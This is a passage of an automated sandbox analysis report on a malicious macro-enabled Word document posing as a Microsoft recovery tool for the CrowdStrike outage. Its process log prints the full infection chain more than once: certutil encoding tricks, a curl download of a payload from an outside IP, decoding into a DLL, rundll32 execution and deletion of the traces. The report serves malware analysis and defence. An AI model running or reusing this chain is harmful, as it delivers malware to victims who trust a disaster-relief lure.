w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drBinary or memory string: Hyper-V Settings
Source: document.xmlBinary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xmlBinary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

barindex
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.drOLE indicator, VBA stomping: true
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c xcopy c:\windows\system32\curl.exe c:\users\user\appdata\local\temp & certutil -f -encode c:\users\user\appdata\local\temp\curl.exe c:\users\user\appdata\local\temp\curl.txt & certutil -f -decode c:\users\user\appdata\local\temp\curl.txt c:\users\user\appdata\local\temp\curl.exe & c:\users\user\appdata\local\temp\curl.exe http://172.104.160.126:8099/payload2.txt -o c:\users\user\appdata\local\temp\mscorsvc.txt & certutil -f -decode c:\users\user\appdata\local\temp\mscorsvc.txt c:\users\user\appdata\local\temp\mscorsvc.dll & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\curl.txt & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\mscorsvc.txt & start " " rundll32 c:\users\user\appdata\local\temp\mscorsvc.dll,dllmain & exit
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\System32\certutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid Accounts13
Command and Scripting Interpreter
32
Scripting
11
Process Injection
13
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
1
Obfuscated Files or Information
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32
LSA Secrets14
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1478411 Sample: New_Recovery_Tool_to_help_w... Startdate: 22/07/2024 Architecture: WINDOWS Score: 88 59 Multi AV Scanner detection for submitted file 2->59 61 Document contains VBA stomped code (only p-code) potentially bypassing AV detection 2->61 63 Machine Learning detection for dropped file 2->63 65 8 other signatures 2->65 7 WINWORD.EXE 291 25 2->7         started        9 WINWORD.EXE 5 19 2->9         started        12 chrome.exe 5 2->12         started        15 chrome.exe 2->15         started        process3 dnsIp4 17 cmd.exe 7->17         started        43 C:\Users\user\AppData\Local\...\~WRC0001.tmp, Microsoft 9->43 dropped 19 cmd.exe 9->19         started        57 239.255.255.250 unknown Reserved 12->57 45 C:\...\MsftRecoveryToolForCSv2.zip (copy), Zip 12->45 dropped 21 chrome.exe 12->21         started        24 chrome.exe 12->24         started        file5 process6 dnsIp7 26 certutil.exe 2 17->26         started        29 xcopy.exe 1 17->29         started        31 certutil.exe 2 17->31         started        39 3 other processes 17->39 33 certutil.exe 2 19->33         started        35 certutil.exe 2 19->35         started        37 certutil.exe 1 19->37         started        41 3 other processes 19->41 51 www.google.com 142.250.203.100, 443, 49170, 49174 GOOGLEUS United States 21->51 53 sb-ssl.l.google.com 172.217.168.14, 443, 49171 GOOGLEUS United States 21->53 55 sb-ssl.google.com 21->55 process8 file9 47 C:\Users\user\AppData\Local\Temp\curl.txt, PEM 26->47 dropped 49 C:\Users\user\AppData\Local\Temp\curl.exe, PE32+ 29->49 dropped

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm26%ReversingLabsScript-Macro.Downloader.Heuristic
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\curl.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://aka.ms/WRH0%Avira URL Cloudsafe
https://curl.se/libcurl/c/curl_easy_setopt.html0%Avira URL Cloudsafe
https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
https://curl.se/0%Avira URL Cloudsafe
http://172.104.160.126:80X990%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/0%Avira URL Cloudsafe
http://172.104.160.126:80990%Avira URL Cloudsafe
https://aka.ms/vs/17/release/vc_redist.x64.exe0%Avira URL Cloudsafe
http://172.104.160.0%Avira URL Cloudsafe
https://curl.se/docs/copyright.html0%Avira URL Cloudsafe
https://curl.se/P0%Avira URL Cloudsafe
https://curl.se/docs/sslcerts.html0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html#0%Avira URL Cloudsafe
https://azure.status.microsoft/status0%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html#0%Avira URL Cloudsafe
https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw0%Avira URL Cloudsafe
https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txt0%Avira URL Cloudsafe
https://curl.se/docs/sslcerts.htmlcurl0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sb-ssl.l.google.com
172.217.168.14
truefalse
    unknown
    www.google.com
    142.250.203.100
    truefalse
      unknown
      sb-ssl.google.com
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlcurl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drfalse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/vs/17/release/vc_redist.x64.exedocument.xmlfalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/copyright.htmlDxcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drfalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/curl.exefalse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/WRH~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drfalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/libcurl/c/curl_easy_setopt.htmlcurl.exe.4.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drfalse
        • Avira URL Cloud: safe
        unknown
        http://172.104.160.126:8099vbaProject.bintrue
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/http-cookies.htmlcurl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drfalse
        • Avira URL Cloud: safe
        unknown
        http://172.104.160.126:80X99vbaProject.binfalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/copyright.htmlcurl.exefalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/hsts.html#curl.exefalse
        • Avira URL Cloud: safe
        unknown
        https://azure.status.microsoft/status~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.drfalse
        • Avira URL Cloud: safe
        unknown
        http://172.104.160.~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.drtrue
        • Avira URL Cloud: safe
        unknown
        https://curl.se/Pxcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drfalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/http-cookies.html#curl.exefalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/sslcerts.htmlcurl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.drfalse
        • Avira URL Cloud: safe
        unknown
        http://172.104.160.126:8099/payload2.txtcurl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/sslcerts.htmlcurlcurl.exefalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        172.217.168.14
        sb-ssl.l.google.comUnited States
        15169GOOGLEUSfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        142.250.203.100
        www.google.comUnited States
        15169GOOGLEUSfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1478411
        Start date and time:2024-07-22 15:50:15 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 56s
        Hypervisor based Inspection enabled:false
        Report type:light
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:25
        Number of new started drivers analysed:2
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
        Detection:MAL
        Classification:mal88.expl.evad.winDOCM@51/26@4/3
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docm
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Found warning dialog
        • Click Ok
        • Attach to Office via COM
        • Browse link: https://go.microsoft.com/fwlink/?linkid=2280386
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe
        • Excluded IPs from analysis (whitelisted): 172.217.168.3, 173.194.79.84, 172.217.168.46, 34.104.35.123, 184.28.89.167, 184.30.24.206, 142.250.203.99
        • Excluded domains from analysis (whitelisted): accounts.google.com, clientservices.googleapis.com, e11290.dspg.akamaiedge.net, clients2.google.com, go.microsoft.com, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, edgedl.me.gvt1.com, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, go.microsoft.com.edgekey.net, update.googleapis.com, download.microsoft.com, clients.l.google.com
        • Execution Graph export aborted for target curl.exe, PID 2432 because there are no executed function
        • Execution Graph export aborted for target curl.exe, PID 3136 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
        No simulations
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
        Category:dropped
        Size (bytes):74268
        Entropy (8bit):7.9444839660162145
        Encrypted:false
        SSDEEP:1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
        MD5:45C59288E77195B7C14579CD59717986
        SHA1:AEF3C27DB85493C0E85CAD04E301C092640E7684
        SHA-256:C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
        SHA-512:7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
        Category:dropped
        Size (bytes):79621
        Entropy (8bit):7.949654755512444
        Encrypted:false
        SSDEEP:1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
        MD5:54A07C35DADB508F554F0ED25AA155B3
        SHA1:84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
        SHA-256:94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
        SHA-512:D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
        Category:modified
        Size (bytes):44995
        Entropy (8bit):7.9304820357792645
        Encrypted:false
        SSDEEP:768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
        MD5:D76D9D62CD9BDB3201F8B08A60DDD681
        SHA1:A0A5A65424C08AD3C165B72DCC790F5682149DA2
        SHA-256:5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
        SHA-512:2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
        Category:dropped
        Size (bytes):66364
        Entropy (8bit):7.930881392262679
        Encrypted:false
        SSDEEP:768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
        MD5:FA62B61B2E012E56787AD09FF660B32A
        SHA1:32F29245140B72BD99D4C42408EDA9DFE4F088CC
        SHA-256:643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
        SHA-512:FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
        Malicious:false
        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Microsoft Word 2007+
